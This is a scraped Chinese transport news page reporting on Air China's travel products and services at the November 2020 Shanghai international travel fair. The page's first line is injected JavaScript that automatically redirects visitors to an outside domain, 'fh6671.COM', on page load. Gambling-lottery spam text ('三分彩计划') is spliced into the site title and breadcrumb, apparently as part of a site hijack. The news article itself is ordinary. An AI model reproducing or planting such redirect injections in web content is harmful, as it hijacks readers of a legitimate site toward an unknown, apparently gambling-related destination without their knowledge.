function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 直通地方

【上海】​国航参展上海旅交会 推介多款旅行产品

2020-11-17 14:37:36 来源:中国交通新闻网 作者:记者 刘玢妤


本网讯 11月16日至18日,在上海举办的中国国际旅游交易会(简称旅交会)上,国航结合疫情期间出台的各项举措,现场展示推介多款航空出行全流程服务产品,并介绍严格的出行安全防护举措。

根据疫情后复苏的市场新特点,国航在新航季有针对性地推出双城次卡、好奇心日历等系列出行产品。其中,“双城次卡”面向经常往来两个城市间的客群推出,每套产品均包含多张优惠券,旅客可享受指定航线双城往返的直减优惠;“好奇心日历”是一款优价预约产品,预约该产品的旅客有机会获得低于国航市场价格的机票预订链接,探亲访友说走就走。

在因公出行方面,国航全面升级了“国航商旅”大客户合作,为客户量身定制航空商旅解决方案。在机上服务方面,国航今年上线的“盒你说”系列餐食产品获得旅客广泛好评,机上酒饮、茶饮不断出新,300多架航班在机上提供包括电影、电视剧、游戏等丰富内容的云端娱乐,旅客可以通过自有电子设备尽享快乐时光,出行正在成为生活新方式。

据了解,旅交会是由文化旅游部、中国民航局和上海市政府共同主办的大型旅游类展会,对推动旅游行业发展、倡导旅行新生活具有积极的促进作用,今年已是国航第21年连续参展。


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。